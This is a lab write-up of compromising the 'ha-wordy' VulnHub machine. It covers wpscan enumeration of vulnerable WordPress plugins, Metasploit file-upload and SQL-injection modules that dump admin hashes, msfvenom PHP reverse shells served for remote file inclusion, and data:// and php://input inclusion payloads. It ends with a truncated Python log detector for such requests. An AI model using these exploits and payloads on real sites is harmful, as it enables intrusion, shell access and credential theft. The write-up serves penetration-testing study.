ha-wordy-Write-up

Information Gathering

➜  ~ nmap -sn 192.168.116.1/24      
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:08 CST
Nmap scan report for 192.168.116.1
Host is up (0.0025s latency).
Nmap scan report for 192.168.116.138
Host is up (0.00072s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.94 seconds
➜ ~ nmap -A -T4 192.168.116.138 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:09 CST
Nmap scan report for 192.168.116.138
Host is up (0.0039s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds
➜ ~
  • The IP is 192.168.116.138; only port 80 is open, and the home page is still the Apache2 default page.
  • Scan directories first; -r disables recursive scanning.
➜  ~ dirb http://192.168.116.138 -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Sep 25 22:17:39 2019
URL_BASE: http://192.168.116.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.116.138/ ----
+ http://192.168.116.138/index.html (CODE:200|SIZE:10918)
+ http://192.168.116.138/info.php (CODE:200|SIZE:15)
==> DIRECTORY: http://192.168.116.138/javascript/
+ http://192.168.116.138/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.116.138/wordpress/

-----------------
END_TIME: Wed Sep 25 22:17:42 2019
DOWNLOADED: 4612 - FOUND: 3
➜ ~
  • Found an info.php, and it is WordPress again.
➜  ~ curl "http://192.168.116.138/info.php"          
192.168.116.138% ➜ ~
  • Requesting info.php returns the server-side IP address, so next scan the WordPress site.
➜  ~ wpscan --url http://192.168.116.138/wordpress/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.116.138/wordpress/
[+] Started: Wed Sep 25 22:23:22 2019

Interesting Finding(s):

[+] http://192.168.116.138/wordpress/
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.116.138/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.116.138/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.116.138/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://192.168.116.138/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.3 identified (Latest, released on 2019-09-05).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.116.138/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
| - http://192.168.116.138/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: twentysixteen
| Location: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/
| Latest Version: 2.0 (up to date)
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/readme.txt
| Style URL: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 2.0 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3, Match: 'Version: 2.0'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
| Location: http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/8609
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
| - https://www.exploit-db.com/exploits/40290/
| - https://cxsecurity.com/issue/WLB-2016080220
|
| [!] Title: Mail Masta 1.0 - Multiple SQL Injection
| References:
| - https://wpvulndb.com/vulnerabilities/8740
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6570
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6571
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6572
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6573
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6574
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6575
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6576
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6577
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6578
| - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
|
| Version: 1.0 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
| Location: http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2019-05-10T16:05:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
| Fixed in: 3.1.4
| References:
| - https://wpvulndb.com/vulnerabilities/7867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133
| - https://www.exploit-db.com/exploits/36374/
| - https://packetstormsecurity.com/files/130845/
| - https://packetstormsecurity.com/files/131515/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
|
| [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
| References:
| - https://wpvulndb.com/vulnerabilities/7985
| - https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
| - https://github.com/scaron/prettyphoto/issues/149
| - https://github.com/wpscanteam/wpscan/issues/818
|
| Version: 3.1.3 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] site-editor
| Location: http://192.168.116.138/wordpress/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/9044
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - http://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2
|
| Version: 1.1.1 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/site-editor/readme.txt

[+] slideshow-gallery
| Location: http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/
| Last Updated: 2019-07-12T13:09:00.000Z
| [!] The version is out of date, the latest version is 1.6.12
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 5 vulnerabilities identified:
|
| [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
| Fixed in: 1.4.7
| References:
| - https://wpvulndb.com/vulnerabilities/7532
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
| - https://www.exploit-db.com/exploits/34681/
| - https://www.exploit-db.com/exploits/34514/
| - http://seclists.org/bugtraq/2014/Sep/1
| - https://packetstormsecurity.com/files/131526/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
|
| [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
| Fixed in: 1.5.3.4
| References:
| - https://wpvulndb.com/vulnerabilities/8263
| - http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
| - http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
|
| [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 1.6.5
| References:
| - https://wpvulndb.com/vulnerabilities/8786
| - https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
| - https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery
|
| [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
| Fixed in: 1.6.6
| References:
| - https://wpvulndb.com/vulnerabilities/8795
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17946
| - http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf
| - https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf
|
| [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
| Fixed in: 1.6.9
| References:
| - https://wpvulndb.com/vulnerabilities/9354
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18017
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18018
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18019
| - https://plugins.trac.wordpress.org/changeset?reponame=&new=1974812%40slideshow-gallery&old=1907382%40slideshow-gallery
| - https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
|
| Version: 1.4.6 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt

[+] wp-easycart-data
| Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-easycart-data/
|
| Detected By: Urls In Homepage (Passive Detection)
|
| The version could not be determined.

[+] wp-support-plus-responsive-ticket-system
| Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: WP Support Plus Responsive Ticket System <= 7.1.3 – Authenticated SQL Injection
| Fixed in: 8.0.0
| References:
| - https://wpvulndb.com/vulnerabilities/8699
| - https://www.exploit-db.com/exploits/40939/
| - http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
| - https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system
|
| [!] Title: WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)
| Fixed in: 8.0.8
| References:
| - https://wpvulndb.com/vulnerabilities/8949
| - https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
|
| [!] Title: WP Support Plus Responsive Ticket System <= 9.0.2 - Multiple Authenticated SQL Injection
| Fixed in: 9.0.3
| References:
| - https://wpvulndb.com/vulnerabilities/9041
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000131
| - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
| - https://plugins.trac.wordpress.org/changeset/1814103/wp-support-plus-responsive-ticket-system
|
| [!] Title: WP Support Plus Responsive Ticket System <= 9.1.1 - Stored XSS
| Fixed in: 9.1.2
| References:
| - https://wpvulndb.com/vulnerabilities/9235
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7299
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15331
| - https://cert.kalasag.com.ph/news/research/cve-2019-7299-stored-xss-in-wp-support-plus-responsive-ticket-system/
| - https://plugins.trac.wordpress.org/changeset/2024484/wp-support-plus-responsive-ticket-system
|
| Version: 7.1.3 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

[+] wp-symposium
| Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/
| Last Updated: 2015-08-21T12:36:00.000Z
| [!] The version is out of date, the latest version is 15.8.1
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 7 vulnerabilities identified:
|
| [!] Title: WP Symposium 13.04 - Unvalidated Redirect
| References:
| - https://wpvulndb.com/vulnerabilities/6383
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2694
|
| [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
| Reference: https://wpvulndb.com/vulnerabilities/6390
|
| [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
| References:
| - https://wpvulndb.com/vulnerabilities/7716
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10021
| - https://www.exploit-db.com/exploits/35543/
| - https://www.exploit-db.com/exploits/35778/
| - http://www.homelab.it/index.php/2014/12/11/wordpress-wp-symposium-shell-upload/
| - https://www.youtube.com/watch?v=pF8lIuLT6Vs
| - http://blog.sucuri.net/2014/12/wp-symposium-zero-day-vulnerability-dangers.html
| - https://packetstormsecurity.com/files/129884/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
|
| [!] Title: WP Symposium <= 15.1 - SQL Injection
| Fixed in: 15.4
| References:
| - https://wpvulndb.com/vulnerabilities/7902
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
| - https://www.exploit-db.com/exploits/37080/
| - http://web.archive.org/web/20150718010246/http://permalink.gmane.org/gmane.comp.security.oss.general/16479
| - https://packetstormsecurity.com/files/131801/
|
| [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
| Fixed in: 15.8
| References:
| - https://wpvulndb.com/vulnerabilities/8140
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
| - https://www.exploit-db.com/exploits/37824/
| - https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
|
| [!] Title: WP Symposium <= 15.1 - Blind SQL Injection
| Fixed in: 15.8
| References:
| - https://wpvulndb.com/vulnerabilities/8148
| - https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
|
| [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
| References:
| - https://wpvulndb.com/vulnerabilities/8175
| - http://cxsecurity.com/issue/WLB-2015090024
|
| Version: 15.1 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.


[+] Finished: Wed Sep 25 22:23:25 2019
[+] Requests Done: 78
[+] Cached Requests: 5
[+] Data Sent: 23.706 KB
[+] Data Received: 17.527 MB
[+] Memory used: 207.039 MB
[+] Elapsed time: 00:00:03
➜ ~
  • This time the scan really did turn up exploitable vulnerabilities: file inclusion, SQL injection, file upload and RCE are all present.

  • SQL injection:

https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin-SQL-Injection-Vulnerability
https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
https://www.exploit-db.com/exploits/40939/
  • File inclusion:
https://www.exploit-db.com/exploits/40290/
  • File upload:
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
https://www.exploit-db.com/exploits/36374/
https://www.exploit-db.com/exploits/34681/
https://www.exploit-db.com/exploits/34514/
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
  • Authentication bypass:
https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
  • Exploit links: the Rapid7 ones can be used directly from MSF; the exploit-db ones need manual testing.
➜  ~ wpscan --enumerate p --url http://192.168.116.138/wordpress/ |grep exp   
| - https://www.exploit-db.com/exploits/40290/
| - https://www.exploit-db.com/exploits/36374/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
| - https://www.exploit-db.com/exploits/34681/
| - https://www.exploit-db.com/exploits/34514/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
| - https://www.exploit-db.com/exploits/40939/
| - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
| - https://www.exploit-db.com/exploits/35543/
| - https://www.exploit-db.com/exploits/35778/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
| - https://www.exploit-db.com/exploits/37080/
| - https://www.exploit-db.com/exploits/37824/
➜ ~
  • For convenience I just used MSF; all of these should work.
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > show options 

Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.138 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.116.1 yes The listen address (an interface may be specified)
LPORT 7788 yes The listen port


Exploit target:

Id Name
-- ----
0 Reflex Gallery 3.1.3


msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) >
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > run

[*] Started reverse TCP handler on 192.168.116.1:7788
[+] Our payload is at: QkwaQFsdu.php. Calling payload...
[*] Calling payload...
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:7788 -> 192.168.116.138:41290) at 2019-09-26 10:28:04 +0800
[+] Deleted QkwaQFsdu.php
meterpreter >

SQL Injection

  • Went on to try the others in turn; the second one needs a username and password, so it could not be tested.
msf5 exploit(unix/webapp/wp_symposium_shell_upload) > use auxiliary/admin/http/wp_symposium_sql_injection 
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > show options

Module options (auxiliary/admin/http/wp_symposium_sql_injection):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
URI_PLUGIN wp-symposium yes The WordPress Symposium Plugin URI
VHOST no HTTP server virtual host

msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set rhosts 192.168.116.138
rhosts => 192.168.116.138
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set targeturi /wordpress
targeturi => /wordpress
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > run
[*] Running module against 192.168.116.138

[+] 192.168.116.138:80 - admin $P$BYWgfD7pa572QS9YFoeVVmhrIhBAx0. [email protected]
[+] 192.168.116.138:80 -
[+] 192.168.116.138:80 - aarti $P$BHyn.q5e5/HG9/UT/Ow3xkH2xXsikx0 [email protected]
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_symposium_sql_injection) >
  • The SQL injection retrieved the passwords, but they are hashed, and cracking with john got nowhere.

  • Going back to the first session, switched to the home directory and found the first flag.

meterpreter > cd raj
meterpreter > ls
Listing: /home/raj
==================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 4770 fil 2019-09-11 12:54:51 +0800 .ICEauthority
100600/rw------- 232 fil 2019-09-11 12:57:45 +0800 .bash_history
100644/rw-r--r-- 220 fil 2019-09-09 14:15:07 +0800 .bash_logout
100644/rw-r--r-- 3771 fil 2019-09-09 14:15:07 +0800 .bashrc
40700/rwx------ 4096 dir 2019-09-09 23:47:31 +0800 .cache
40700/rwx------ 4096 dir 2019-09-09 21:20:39 +0800 .config
40700/rwx------ 4096 dir 2019-09-09 21:20:05 +0800 .dbus
40700/rwx------ 4096 dir 2019-09-09 15:51:12 +0800 .gnupg
40700/rwx------ 4096 dir 2019-09-09 21:20:06 +0800 .gvfs
40700/rwx------ 4096 dir 2019-09-09 14:20:30 +0800 .local
40700/rwx------ 4096 dir 2019-09-09 14:34:23 +0800 .mozilla
100600/rw------- 39 fil 2019-09-09 15:23:00 +0800 .mysql_history
100644/rw-r--r-- 807 fil 2019-09-09 14:15:07 +0800 .profile
40700/rwx------ 4096 dir 2019-09-09 15:51:12 +0800 .ssh
100644/rw-r--r-- 0 fil 2019-09-09 14:21:21 +0800 .sudo_as_admin_successful
40755/rwxr-xr-x 4096 dir 2019-09-10 00:23:02 +0800 Desktop
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Documents
40755/rwxr-xr-x 4096 dir 2019-09-09 16:23:53 +0800 Downloads
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Music
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Pictures
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Public
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Templates
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Videos
100644/rw-r--r-- 8980 fil 2019-09-09 14:15:07 +0800 examples.desktop
100644/rw-r--r-- 41 fil 2019-09-10 12:06:56 +0800 flag1.txt
40755/rwxr-xr-x 4096 dir 2019-09-09 16:18:54 +0800 plugin

meterpreter > cat flag1.txt
aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu
meterpreter >
➜ VulnHub echo "aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu" |base64 -d
https://www.hackingarticles.in%
  • In the web root there is a notes.txt file and a password-protected zip archive.
[email protected]:/var/www/html$ ls
ls
index.html info.php notes.txt secret.zip wordpress
[email protected]:/var/www/html$ cat notes.txt
cat notes.txt
You Need to ZIP Your Wayout
[email protected]:/var/www/html$ cat info.php
cat info.php
<?php
echo $_SERVER['HTTP_HOST'];
?>
[email protected]:/var/www/html$
  • The password is the hash of the admin password obtained via the SQL injection above.
➜  VulnHub unzip secret.zip                                          
Archive: secret.zip
[secret.zip] link.txt password:
inflating: link.txt
➜ VulnHub cat link.txt
https://www.exploit-db.com/exploits/38861
https://www.exploit-db.com/exploits/40290
https://www.exploit-db.com/exploits/36374
https://www.exploit-db.com/exploits/37824
https://www.exploit-db.com/exploits/41006%
➜ VulnHub
  • It turns out to be a bunch of links, apparently the same ones wpscan found, so it does not seem to add anything; together with the notes.txt hint, it just tells you there are several ways to get a shell.

CVE-2015-8351 Remote File Inclusion

  • First, remote file inclusion
  • Start the MSF listener
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 2333
lport => 2333
msf5 exploit(multi/handler) > set lhost 192.168.116.1
lhost => 192.168.116.1
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.116.1 yes The listen address (an interface may be specified)
LPORT 2333 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:2333 -> 192.168.116.138:42968) at 2019-09-26 11:45:39 +0800

meterpreter >
  • Set up HTTP: rename the shell to wp-load.php and start the HTTP server.
➜  VulnHub msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell.php
➜ VulnHub python3.7 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.116.138 - - [26/Sep/2019 11:45:11] code 404, message File not found
192.168.116.138 - - [26/Sep/2019 11:45:11] "GET /shell.phpwp-load.php HTTP/1.0" 404 -
^C
Keyboard interrupt received, exiting.
➜ VulnHub
➜ VulnHub cp shell.php wp-load.php
➜ VulnHub python3.7 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.116.138 - - [26/Sep/2019 11:45:39] "GET /wp-load.php HTTP/1.0" 200 -
  • Requesting http://192.168.116.138/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.116.1:8000/ gets a session.

Local File Inclusion

  • Sensitive information: /etc/apache2/.htpasswd

  • The description says local file inclusion, but when I tested it remote file inclusion worked too, which makes getting command execution easier.

  • Requesting http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.116.1:8000/shell.php gives a remote session.

  • The local-inclusion approach is to upload a file containing malicious PHP code, find the upload path, then include it to get a session.

  • Log files can also be included by finding a way to get a one-line web shell written into a log, usually the Apache access log or the SSH failed-login log, depending on which services the server exposes. This box is a bit of a trap, though: only Apache is running, and the logs cannot be read.
  • There is still a way, though: the various stream wrappers PHP supports.
http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg==

➜ ~ curl "http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://input" -d "<?php phpinfo();?>"
  • phpinfo shows quite a few supported wrappers:
https, ftps, compress.zlib, php, file, glob, data, http, ftp, compress.bzip2, phar, zip
  • I will not demonstrate the one-line web shell.
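As an added example (not from the original write-up), a small Python detector that flags, in Apache access-log lines, the request shapes used above against mail-masta's pl= and gwolle-gb's abspath= parameters: PHP stream wrappers, remote URLs and path traversal, including double-encoded values. The log lines are constructed; the parameter names and plugin paths come from the write-up, and the wrapper list mirrors the phpinfo output above.

```python
"""Detect the inclusion requests shown above in Apache access logs: a query
parameter (mail-masta's pl=, gwolle-gb's abspath=) carrying a PHP stream
wrapper, a remote URL, or a path traversal. Log lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format; fields after status/size are not needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Wrappers that include()/require() will open when allow_url_include or the
# data/php wrappers are available (the phpinfo list above shows them).
WRAPPER_RE = re.compile(
    r'^(?:php|data|phar|zip|glob|file|compress\.(?:zlib|bzip2)|https?|ftps?)://',
    re.IGNORECASE,
)
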